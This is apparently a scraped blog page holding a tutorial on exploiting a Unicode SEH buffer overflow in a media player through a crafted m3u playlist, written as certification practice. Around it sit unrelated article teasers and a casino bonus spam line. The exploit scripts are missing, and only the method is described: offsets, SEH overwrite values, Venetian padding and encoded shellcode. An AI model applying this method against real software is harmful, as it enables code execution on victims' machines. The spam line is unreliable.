Clearing the Palette

It came in a 9x12 box with a chipboard print (usually of a horse since that was my obsession), a plastic pot set of 8 colors, and a paint brush. I could sit for hours painting those prints, but you…

Smartphone

独家优惠奖金 100% 高达 1 BTC + 180 免费旋转




Unicode Buffer Overflow

The aim of this article will be the exploitation of buffer overflow vulnerability in applications that use Unicode format, rather than ASCII. We will see the theory first, then the practice. A proper understanding of this article requires knowing how to exploit a simple buffer overflow and how SEH exploit works, or at least the basics behind this type of vulnerability.

If you are interested in SEH exploitation, I have written an article about it.

When we send a payload to an application, usually the characters are interpreted as ASCII, which is a set of 256 characters. One ASCII letter is translated into exactly one byte of memory so it is easy to place certain bytes in certain memory areas. Unlike ASCII each character occupies two bytes in the Unicode format. Below is a portion of the Unicode codes for the first half of the lowercase alphabet.

It is common for applications to translate buffers from ASCII format to Unicode format. All ASCII characters below 0x7F have zeros as prefixes when they are extended into Unicode. Characters from 0x80 up are translated into 2 bytes and may not include the original byte value and this could create problems in creating an exploit. In addition, some applications may work in the opposite way, adding the zeros in a different position after the transformation, so “AA” will become “0x41004100” instead of “0x00410041.”

The exploitation of Unicode is very situational and requires
adapting to the constraints that arise during the exploitation process. There are some general methodologies that can help exploit applications that translate to Unicode.

Let’s see what are the possibilities in order to exploit a Unicode-translating application:

When we attempt to place the shellcode, it can also be translated. This means that the shellcode will become unusable since the translation to Unicode will add null bytes inside. However, one could encode the shellcode to make it Unicode-compatible.

The fact that most bytes are null does not mean that we cannot execute code. It just means that we are limited. There is a set of instructions that can be used even in the presence of zeros. Shellcode based on these instructions has been called Venetian shellcode. The Venetian shellcode technique is mainly used to close the gaps made by the null bytes.

The software is vulnerable when a modified playlist is loaded, which is a file with the m3u extension. We will start with a script that generates a malicious m3u file. The initial script is:

So to start, we create our malicious playlist with the previous script, after that we run the software and attach a debugger to it

then we open the malicious file from the application, Bottom right on PL -> File -> Load List.

and the software gets an exception

we pass it to the application with Shift+F9. The EIP becomes 0x00410041

this means we can overwrite the EIP and then we can verify that the exception handler structure has been overwritten by viewing the SEH chain from the Immunity Debugger (View -> SEH Chain )

Then it is a Unicode buffer overflow based on SEH. We try to understand the offset of the SEH structure to figure out how to override the EIP. Create a pattern with mona:

We update the script and include the pattern we just created, we perform the previous steps i.e. we run the script, the app we attach it to a debugger and load the malicious file, and when the exception is caught instead of passing it to the program with Shift+F9, we go and analyze the SEH chain via Immunity.

We take the two consecutive addresses found in the SEH chain window which are 390072 and 410038 and look for the offset like this:

The offset is 536. If we look at the exploit code on exploit db we can see that we end up with the same result

After 536 bytes we start writing into the SEH structure. The exploit will change in:

The run it and

SEH Chain
EIP is changed

Passing the exception to the program with shift+f9 we notice that the EIP is different. This is because 0x00430043 is a valid address in the application and the program is managed to execute a few more instructions than we had planned in our exploit. After executing a few instructions, the program encounters an instruction that relies on data that has been changed due to the overflow and the application crash occurs.

The exploitation is the same as that of a classical SEH the only thing to remember is that we cannot use “\xEB\x06” to jump over the SEH because it is not a Unicode-compatible instruction. However, there are other instructions we can use that produce the same effect. Instead of skipping over the SEH, we go through it and fill it with instructions that do not cause the application to crash.

Let’s test the different instructions, the one that has been tested and works is found at 0x004100F2. We will override the nSEH with 4161, which after transformation to Unicode becomes 0x00410061, 41 is used to align the bytes i.e., to complete the structure of the nSEH, which consists of 4 bytes, so that the SEH is overwritten in the right way. And the SEH with 41F2, which after transformation will become 0x004100F2 which is the address of where the POP/POP/RET instruction is located.

We update our exploit with this new data and set a breakpoint after we cross the SEH.

We need to find a reference to our buffer in memory and jump to that location so that we can execute our shellcode. We can do this by having one of the registers point to our buffer, changing the current value of the register. When we execute the exploit and passed the exception to the program with shift+f9, if we look at the EAX register and right click on it then click on Follow in Stack we see this

We can see from the image that the EAX register keeps a reference to the SEH structure. From the above image, you can also see that there is our buffer consisting of the NOP operations (90) in the lower addresses so if we could decrement the EAX a little bit and make a jump to the EAX we will be able to execute our buffer. The exploit will change in:

After resuming execution from the SEH, we fill the last byte with a NOP operation using a byte \x6E, which is linked to a byte \x00. This byte \x00 is obtained by extending the byte \x90 to Unicode format, resulting in an instruction that does nothing, represented as 0x006E00.

Now, we can operate on the EAX register. Both the ADD and SUB statements are supported by Unicode. However, due to the transformation to Unicode, each number is extended with 00s, allowing us to perform multiplications of 100h (h stands for hexadecimal).

The two operations are as follows:

This increment is necessary to point to a part of our buffer formed by the Ds. However, upon right-clicking on EAX and selecting follow in the stack, we notice that we do not encounter the beginning of our buffer of D’s. Despite this gap, there is still enough space to place a shellcode after the address currently pointed to by EAX. We will address this gap later.

We cannot use the call EAX instruction because it is not Unicode compatible. In this case, we use PUSH EAX / RET filled with Venetian padding.

After passing the exception to the program we can see that we happened upon the Ds buffer and that the app encountered another exception. We have skipped past the breakpoints; to execute them we need to add a temporary buffer before them.

Let’s perform the subtraction between the address where the D-buffer begins (including breakpoints) and the address that the EAX points to. According to the below screenshot, the D-buffer partially starts at 0x0018E238, as there is one byte that is not part of the breakpoints.

The address to which EAX points is 0x0018E318, the result is 224 in decimal bytes, in hexadecimal we have E0. Considering that Unicode transforms each character into its 2-byte representation then our buffer should be 112 bytes which is half of 224. However we have to remember that one byte was not part of the breakpoints i.e. byte C3, so it has to be removed from the buffer then the size should be 111 bytes. We introduce this 111-byte offset into our exploit:

We were able to redirect the execution flow to an area of memory that we control. The last part will be to add the shellcode.

An alphanumeric shellcode is a specific type of shellcode that is designed to be compatible with Unicode exploits. Its construction involves creating a shellcode that, upon being sent to the targeted application and converted to Unicode format, triggers a process that unpacks another set of instructions in runtime memory. These instructions then initiate the execution of the actual malicious shellcode. While it is possible to manually create the alphanumeric shellcode, many security researchers and attackers use encoder tools to generate it more conveniently. Among the popular encoders are “msfvenom’s alpha encoder” and the “original alpha encoder” run by SkyLined.

We generate a shellcode that will pop up the calculator with msfvenom:

Then we pass it to the encoder

The final exploit will be:

I wrote this article in parallel with the exploitation of the software. It was an exercise in preparation for eCXD certification.

Add a comment

Related posts:

Doing Democracy

It was a warm summer evening — a weekday after work — and my 16-year-old daughter and I were knocking on doors in a working-class neighborhood tucked under the Verrazano Bridge. I’d been crossing…

How to Help Your Teens Get Along During Lockdown

Parenting teenagers has never been easy, and the pandemic isn’t making it any easier. Not only is Covid causing a lot of stress for parents and teens individually, but it may actually be disrupting…

When Anxiety Clouds Your Thinking Look at Thoughts Objectively

Anxiety causes me to question everything. Or maybe it's not anxiety but past traumas. Whatever it is, I'm aware of it now. The question that plagued my mind was are people being kind to me because…